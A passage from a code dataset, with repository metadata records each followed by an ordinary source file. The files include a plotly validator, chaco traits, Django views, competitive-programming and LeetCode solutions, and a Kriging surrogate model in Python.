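# whitespace, so the quote marks must stand alone as their own tokens:
#
#   nCO " Hello, world! "
#
# Run with Python 2:  python nco.py program.nco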
|
[
"[email protected]"
] | |
d398d48c8080f72fa8318e8bace03ec75d59c088
|
acf7457d3a799cb9bff12686d2d616688bcd4b5b
|
/packages/python/plotly/plotly/validators/splom/marker/colorbar/_ticklabelstep.py
|
60e50e822cdfe58fb01e5adc7eecda99cb369c3c
|
[
"MIT"
] |
permissive
|
plotly/plotly.py
|
f4f61639f08160f16195efc95b5901dc5a937346
|
975a704074f01c078e0fdfa32bdf17130bf89e69
|
refs/heads/master
| 2023-09-06T06:15:08.340035 | 2023-08-24T12:28:14 | 2023-08-24T12:28:14 | 14,579,099 | 14,751 | 2,989 |
MIT
| 2023-09-08T19:55:32 | 2013-11-21T05:53:08 |
Python
|
UTF-8
|
Python
| false | false | 487 |
py
|
import _plotly_utils.basevalidators
class TicklabelstepValidator(_plotly_utils.basevalidators.IntegerValidator):
def __init__(
self, plotly_name="ticklabelstep", parent_name="splom.marker.colorbar", **kwargs
):
super(TicklabelstepValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "colorbars"),
min=kwargs.pop("min", 1),
**kwargs,
)
|
[
"[email protected]"
] | |
d5ab8cba4a8c372c31f9f94079edb50e6fae9033
|
0ccd29f678d3b88832eac8b6b577cb32ee1c0653
|
/chaco/chaco_traits.py
|
8b1ae8d2cc554ef3eb42d64b3d1c8efe49ef7629
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-public-domain"
] |
permissive
|
martinRenou/chaco
|
7f0bc36619268f024bc5ea1e62178d5ef77f4b6e
|
1888da3ecee89f9b2d11900cda9333b32fc5e89a
|
refs/heads/master
| 2020-07-21T03:40:17.652867 | 2019-09-01T12:12:04 | 2019-09-01T12:12:04 | 206,750,733 | 0 | 0 |
NOASSERTION
| 2019-09-06T08:36:50 | 2019-09-06T08:36:50 | null |
UTF-8
|
Python
| false | false | 796 |
py
|
""" Defines various traits that are used in many places in Chaco.
"""
# Enthought library imports
from traits.api import Enum
#----------------------------------------------------------------------------
# Box positioning traits: used to specify positions of boxes relative to
# one another. Generally used for layout.
#----------------------------------------------------------------------------
box_edge_enum = Enum("left", "right", "top", "bottom")
# Values correspond to: top, bottom, left, right, top left, top right, bottom
# left, bottom right
box_position_enum = Enum("T", "B", "L", "R", "TL", "TR", "BL", "BR")
# For backwards compatibility, import LineStyle & LineStyleEditor from enable.
# (They used to be defined here.)
from enable.api import LineStyle, LineStyleEditor
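# Usage sketch (illustrative; the class name is hypothetical): these shared
# trait definitions are meant to be reused directly on HasTraits subclasses.
#
# from traits.api import HasTraits
#
# class EdgeMarker(HasTraits):
#     edge = box_edge_enum          # defaults to "left"
#     position = box_position_enum  # defaults to "T"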
# EOF
|
[
"[email protected]"
] | |
201ccbd6e28d692a9e14c5f2478ed25401e276b1
|
08e052c0c2ee4ad0cd4980fbc8a692c407118659
|
/venv/bin/chardetect
|
e40b7008dff3ce3f22024dfecbd68230af3a2b76
|
[] |
no_license
|
miltonleal/MAC0110_Introduction_Computer_Science_IME_USP
|
6fad182f7fbb3e83403080800074bf57456cb0b5
|
b47936ce66e715dba79dff44779a750d795192a0
|
refs/heads/master
| 2023-03-04T11:06:48.092980 | 2021-02-17T14:47:46 | 2021-02-17T14:47:46 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 259 |
#!/Users/admin/PycharmProjects/MAC110/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from chardet.cli.chardetect import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"[email protected]"
] | ||
6b977a8c07dfe5e184c2f3e20aa3b4c488859dfe
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03838/s376717183.py
|
4bdb937150e0dcdff3a481bbfa20fc4825cb3304
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 962 |
py
|
import sys, re
from collections import deque, defaultdict, Counter
from math import ceil, sqrt, hypot, factorial, pi, sin, cos, radians
from itertools import accumulate, permutations, combinations, product
from operator import itemgetter, mul
from copy import deepcopy
from string import ascii_lowercase, ascii_uppercase, digits
from bisect import bisect, bisect_left
from fractions import gcd
from heapq import heappush, heappop
from functools import reduce
def input(): return sys.stdin.readline().strip()
def INT(): return int(input())
def MAP(): return map(int, input().split())
def LIST(): return list(map(int, input().split()))
def ZIP(n): return zip(*(MAP() for _ in range(n)))
sys.setrecursionlimit(10 ** 9)
INF = float('inf')
mod = 10 ** 9 + 7
x, y = MAP()
if x*y < 0:
print(1+abs(abs(x)-abs(y)))
elif x == 0 or y == 0:
if x < y:
print(max(abs(x), abs(y)))
else:
print(1+max(abs(x), abs(y)))
else:
if y > x:
print(y-x)
else:
print(2+x-y)
|
[
"[email protected]"
] | |
84cd6d0ec245d8c1be7c030aafca4fa7e34c996e
|
ea8f71a9a609f15f42bff595bb467722791244a7
|
/todo/views.py
|
7f489b3f455874f44a52039e8b726be1db9ae581
|
[] |
no_license
|
Roderich25/pythonanywhereapp
|
aafe600cd33c69347655b685f4b792038196aede
|
1bd46136e316ea175441ce14a722ddf5b266f767
|
refs/heads/master
| 2023-05-11T09:37:11.888269 | 2019-10-21T13:24:00 | 2019-10-21T13:24:00 | 216,573,629 | 0 | 0 | null | 2023-04-21T20:39:16 | 2019-10-21T13:21:21 |
Python
|
UTF-8
|
Python
| false | false | 1,017 |
py
|
from django.shortcuts import render, redirect
from .models import Todo
from .forms import TodoForm, NewTodoForm
from django.views.decorators.http import require_POST
def index(request):
# form = TodoForm()
form = NewTodoForm()
todo_list = Todo.objects.order_by('-id')
context = {"todo_list": todo_list, "form": form}
return render(request, 'todo/index.html', context=context)
@require_POST
def add_todo(request):
# form = TodoForm(request.POST)
form = NewTodoForm(request.POST)
if form.is_valid():
# new_todo = Todo(text=form.cleaned_data['text'])
# new_todo.save()
form.save()
return redirect('index')
def todo_completed(request, todo_id):
todo = Todo.objects.get(pk=todo_id)
todo.completed = True
todo.save()
return redirect('index')
def delete_completed(request):
Todo.objects.filter(completed=True).delete()
return redirect('index')
def delete_all(request):
Todo.objects.all().delete()
return redirect('index')
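# Hedged sketch (the URL patterns are assumptions; only the 'index' name is
# relied on by the views above): one possible app urls.py wiring these views.
#
# from django.urls import path
# from . import views
#
# urlpatterns = [
#     path('', views.index, name='index'),
#     path('add/', views.add_todo, name='add_todo'),
#     path('completed/<int:todo_id>/', views.todo_completed, name='todo_completed'),
#     path('delete-completed/', views.delete_completed, name='delete_completed'),
#     path('delete-all/', views.delete_all, name='delete_all'),
# ]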
|
[
"[email protected]"
] | |
80bb4b70c97cfbda2f8175dc88f4e6e29922de08
|
d2c4934325f5ddd567963e7bd2bdc0673f92bc40
|
/tests/model_control/detailed/transf_Quantization/model_control_one_enabled_Quantization_PolyTrend_Seasonal_DayOfMonth_LSTM.py
|
bae3999426ca9e05b0f4c9111fc8851a700d1b80
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
jmabry/pyaf
|
797acdd585842474ff4ae1d9db5606877252d9b8
|
afbc15a851a2445a7824bf255af612dc429265af
|
refs/heads/master
| 2020-03-20T02:14:12.597970 | 2018-12-17T22:08:11 | 2018-12-17T22:08:11 | 137,104,552 | 0 | 0 |
BSD-3-Clause
| 2018-12-17T22:08:12 | 2018-06-12T17:15:43 |
Python
|
UTF-8
|
Python
| false | false | 171 |
py
|
import pyaf.tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['Quantization'] , ['PolyTrend'] , ['Seasonal_DayOfMonth'] , ['LSTM'] );
|
[
"[email protected]"
] | |
28c9709a759eca89ba9fd8190f371c4e58acd657
|
bfa51f4adc2e2a84c98b3bd02e446a1d8a2fd663
|
/mtrack/views/facility_locations.py
|
f3f827bf39313783eb50cfe58c0a4a8320177745
|
[] |
no_license
|
unicefuganda/rapidsms-mtrack
|
a47f7b1a89240fb1c9145bc4dcbb950f1e35df95
|
a03cc6cf46a73620e0eb1bc3fe67816d9029f2d6
|
refs/heads/master
| 2021-05-16T02:25:01.278824 | 2019-07-10T18:42:22 | 2019-07-10T18:42:22 | 2,011,844 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,895 |
py
|
import datetime
from django.template import RequestContext
from django.shortcuts import redirect, get_object_or_404, render_to_response
from rapidsms.contrib.locations.models import Location
from healthmodels.models.HealthFacility import HealthFacility
from rapidsms_httprouter.models import Message
from django.http import HttpResponse
from django.utils import simplejson
from django.conf import settings
def facility_cas(request):
#consider a list
locs = Location.objects.filter(type__name='district').values_list('name',flat=True)
locs = [l.upper() for l in locs]
districts = Location.objects.filter(type__name='district').values('id', 'name').order_by('name')
#facilities = HealthFacility.objects.all().values('id', 'name', 'type__slug').order_by('name')
facilities = [(0, 'Select Facility')]
if request.method == 'POST':
pass
else:
pass
return render_to_response('mtrack/facility_locations.html', {'districts': districts,
'facilities': facilities,
},
context_instance=RequestContext(request))
def ajax_portal2(request):
xtype = request.GET.get('xtype', '')
xid = request.GET.get('xid', '')
if xtype == 'district':
district_locs = Location.objects.get(pk=xid).get_descendants(include_self=True)
facilities = list(HealthFacility.objects.filter(catchment_areas__in=district_locs).\
values('id', 'name', 'type__slug').order_by('name').distinct())
response = facilities
elif xtype == 'facility':
response = list(HealthFacility.objects.get(pk=xid).catchment_areas.all().values('name','type'))
else:
response = []
json = simplejson.dumps(response)
return HttpResponse(json, mimetype='application/json')
|
[
"[email protected]"
] | |
357f0f3acd183afa00d04846c89e4cf6dc948676
|
e94c3e02b390b7c37214218083e4c5b2ad622f60
|
/算法与数据结构/LeetCode/动态规划(DP)/968.监控二叉树.py
|
530702ab36f40a07726d0e3b8f30b2727950cbd3
|
[
"MIT"
] |
permissive
|
nomore-ly/Job
|
1160e341d9c78c2f99846995893f0289f4e56cf6
|
ff4fd24447e30e2d17f15696842e214fba7ad61b
|
refs/heads/master
| 2023-06-21T00:23:47.594204 | 2021-07-23T07:29:47 | 2021-07-23T07:29:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 725 |
py
|
#
# @lc app=leetcode.cn id=968 lang=python3
#
# [968] Binary Tree Cameras (监控二叉树)
#
# @lc code=start
from typing import List  # needed for the List[int] annotation used below


# Definition for a binary tree node.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def minCameraCover(self, root: TreeNode) -> int:
        # Tree DP: for each node return three costs:
        #   a - this node holds a camera and its subtree is fully covered
        #   b - subtree fully covered, camera at this node optional
        #   c - both child subtrees covered, this node itself may be uncovered
        def dfs(root: TreeNode) -> List[int]:
if not root:
return [float("inf"), 0, 0]
la, lb, lc = dfs(root.left)
ra, rb, rc = dfs(root.right)
a = lc + rc + 1
b = min(a, la + rb, ra + lb)
c = min(a, lb + rb)
return [a, b, c]
a, b, c = dfs(root)
return b
# @lc code=end
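# Illustrative check (not part of the LeetCode submission): a root with two
# leaf children is covered by a single camera placed at the root.
if __name__ == "__main__":
    demo_root = TreeNode(0)
    demo_root.left = TreeNode(0)
    demo_root.right = TreeNode(0)
    print(Solution().minCameraCover(demo_root))  # expected output: 1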
|
[
"[email protected]"
] | |
2c8e6d3328b1b0201a0de2960ec5aa1b14674ed3
|
3db1c06cd10d4a72c3e778006364d5a83d1c5e2c
|
/subisuhostcheck/djangomonitoring/kitsune/management/commands/kitsune_run_job.py
|
4362fb85945fc4d9a3c90dc6185ecf600ab9a68d
|
[] |
no_license
|
shaktijeet-ego/hostdown
|
14f07d309c0346ea0a67d321d774a788d2a1b75e
|
9eab7ff08746c0c276bdc46bd1f52d2f02d7d2bb
|
refs/heads/master
| 2023-04-05T19:22:57.064463 | 2021-04-28T03:35:34 | 2021-04-28T03:35:34 | 353,187,372 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 780 |
py
|
import sys
from django.core.management import call_command
from django.core.management.base import BaseCommand
from kitsune.models import Job, Log
class Command(BaseCommand):
help = 'Runs a specific job. The job will only run if it is not currently running.'
args = "job.id"
def handle(self, *args, **options):
try:
job_id = args[0]
except IndexError:
sys.stderr.write("This command requires a single argument: a job id to run.\n")
return
try:
job = Job.objects.get(pk=job_id)
except Job.DoesNotExist:
sys.stderr.write("The requested Job does not exist.\n")
return
# Run the job and wait for it to finish
job.handle_run()
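# Typical invocation of this management command (the job id 42 is a placeholder):
#
#   python manage.py kitsune_run_job 42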
|
[
"[email protected]"
] | |
b8a39e4b237775fa112b8b08084ab7469ea8f0e7
|
a9e051485379fb7e569a7c8458045e9eb56d4cf8
|
/surrogate/estimator/kriging.py
|
357dcc5bdc81b8748f80326eee090c87827710c9
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
liujiamingustc/phd
|
7634056500c481d39fa036bf0ed744c1d13b0035
|
4f815a738abad43531d02ac66f5bd0d9a1def52a
|
refs/heads/master
| 2020-05-17T07:02:56.000146 | 2019-04-24T15:04:19 | 2019-04-24T15:04:19 | 183,567,207 | 4 | 0 | null | 2019-04-26T06:04:37 | 2019-04-26T06:04:37 | null |
UTF-8
|
Python
| false | false | 6,594 |
py
|
# Copyright 2016 Quan Pan
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Quan Pan <[email protected]>
# License: Apache License, Version 2.0
# Create: 2016-12-02
""" Surrogate model based on Kriging. """
from math import log
from surrogate.base import SurrogateModel
# pylint: disable-msg=E0611,F0401
from numpy import zeros, dot, ones, eye, abs, exp, log10, diagonal, \
prod, square, column_stack, ndarray, sqrt, inf, einsum, sum, power
from numpy.linalg import slogdet, linalg
from numpy.dual import lstsq
from scipy.linalg import cho_factor, cho_solve
from scipy.optimize import minimize
class KrigingSurrogate(SurrogateModel):
"""Surrogate Modeling method based on the simple Kriging interpolation.
Predictions are returned as a tuple of mean and RMSE
"""
def __init__(self):
super(KrigingSurrogate, self).__init__()
        self.m = 0  # number of independent variables (input dimension)
self.n = 0 # number of training points
self.thetas = zeros(0)
self.nugget = 0 # nugget smoothing parameter from [Sasena, 2002]
self.R = zeros(0)
self.R_fact = None
self.R_solve_ymu = zeros(0)
self.R_solve_one = zeros(0)
self.mu = zeros(0)
self.log_likelihood = inf
# Training Values
self.X = zeros(0)
self.Y = zeros(0)
def fit(self, x, y):
"""Train the surrogate model with the given set of inputs and outputs.
:param x: Training input locations
:param y: Model responses at given inputs.
"""
super(KrigingSurrogate, self).fit(x, y)
self.m = len(x[0])
self.n = len(x)
if self.n <= 1:
raise ValueError(
'KrigingSurrogate require at least 2 training points.'
)
self.X = x
self.Y = y
def _calcll(thetas):
# Callback function
self.thetas = thetas
self._calculate_log_likelihood()
return -self.log_likelihood
cons = []
        for i in xrange(self.m):
            # Bind i as a default argument: a plain closure would late-bind and
            # make every constraint use the last value of i.
            cons.append({'type': 'ineq', 'fun': lambda logt, i=i: logt[i] - log10(1e-2)})  # min
            cons.append({'type': 'ineq', 'fun': lambda logt, i=i: log10(3) - logt[i]})  # max
self.thetas = minimize(_calcll, zeros(self.m), method='COBYLA',
constraints=cons, tol=1e-8).x
self._calculate_log_likelihood()
def _calculate_log_likelihood(self):
"""Calculates the log-likelihood (up to a constant) for a given
self.theta.
"""
R = zeros((self.n, self.n))
X, Y = self.X, self.Y
thetas = power(10., self.thetas)
# exponentially weighted distance formula
for i in xrange(self.n):
R[i, i + 1:self.n] = exp(-thetas.dot(square(X[i, ...] - X[i + 1:self.n, ...]).T))
R *= (1.0 - self.nugget)
R += R.T + eye(self.n)
self.R = R
one = ones(self.n)
rhs = column_stack([Y, one])
try:
# Cholesky Decomposition
self.R_fact = cho_factor(R)
sol = cho_solve(self.R_fact, rhs)
solve = lambda x: cho_solve(self.R_fact, x)
det_factor = log(abs(prod(diagonal(self.R_fact[0])) ** 2) + 1.e-16)
except (linalg.LinAlgError, ValueError):
# Since Cholesky failed, try linear least squares
self.R_fact = None # reset this to none, so we know not to use Cholesky
sol = lstsq(self.R, rhs)[0]
solve = lambda x: lstsq(self.R, x)[0]
det_factor = slogdet(self.R)[1]
self.mu = dot(one, sol[:, :-1]) / dot(one, sol[:, -1])
y_minus_mu = Y - self.mu
self.R_solve_ymu = solve(y_minus_mu)
self.R_solve_one = sol[:, -1]
self.sig2 = dot(y_minus_mu.T, self.R_solve_ymu) / self.n
if isinstance(self.sig2, ndarray):
self.log_likelihood = -self.n / 2. * slogdet(self.sig2)[1] \
- 1. / 2. * det_factor
else:
self.log_likelihood = -self.n / 2. * log(self.sig2) \
- 1. / 2. * det_factor
def predict(self, x):
"""Calculates a predicted value of the response based on the current
trained model for the supplied list of inputs.
:param x: Point at which the surrogate is evaluated.
"""
super(KrigingSurrogate, self).predict(x)
X, Y = self.X, self.Y
thetas = power(10., self.thetas)
r = exp(-thetas.dot(square((x - X).T)))
if self.R_fact is not None:
# Cholesky Decomposition
sol = cho_solve(self.R_fact, r).T
else:
# Linear Least Squares
sol = lstsq(self.R, r)[0].T
f = self.mu + dot(r, self.R_solve_ymu)
term1 = dot(r, sol)
# Note: sum(sol) should be 1, since Kriging is an unbiased
# estimator. This measures the effect of numerical instabilities.
bias = (1.0 - sum(sol)) ** 2. / sum(self.R_solve_one)
mse = self.sig2 * (1.0 - term1 + bias)
rmse = sqrt(abs(mse))
return f, rmse
def linearize(self, x):
"""Calculates the jacobian of the Kriging surface at the requested point.
:param x: Point at which the surrogate Jacobian is evaluated.
"""
thetas = power(10., self.thetas)
r = exp(-thetas.dot(square((x - self.X).T)))
# Z = einsum('i,ij->ij', X, Y) is equivalent to, but much faster and
# memory efficient than, diag(X).dot(Y) for vector X and 2D array Y.
# I.e. Z[i,j] = X[i]*Y[i,j]
gradr = r * -2 * einsum('i,ij->ij', thetas, (x - self.X).T)
jac = gradr.dot(self.R_solve_ymu).T
return jac
class FloatKrigingSurrogate(KrigingSurrogate):
"""Surrogate model based on the simple Kriging interpolation. Predictions are returned as floats,
which are the mean of the model's prediction.
"""
def predict(self, x):
dist = super(FloatKrigingSurrogate, self).predict(x)
return dist[0] # mean value
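# Usage sketch (illustrative; the sample values are made up): fit on a handful
# of 1-D training points, then query the mean prediction and its RMSE estimate.
#
# import numpy as np
# x = np.array([[0.0], [1.0], [2.0], [3.0]])
# y = np.array([0.0, 1.0, 1.5, 0.5])
# surrogate = KrigingSurrogate()
# surrogate.fit(x, y)
# mean, rmse = surrogate.predict(np.array([1.5]))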
|
[
"[email protected]"
] |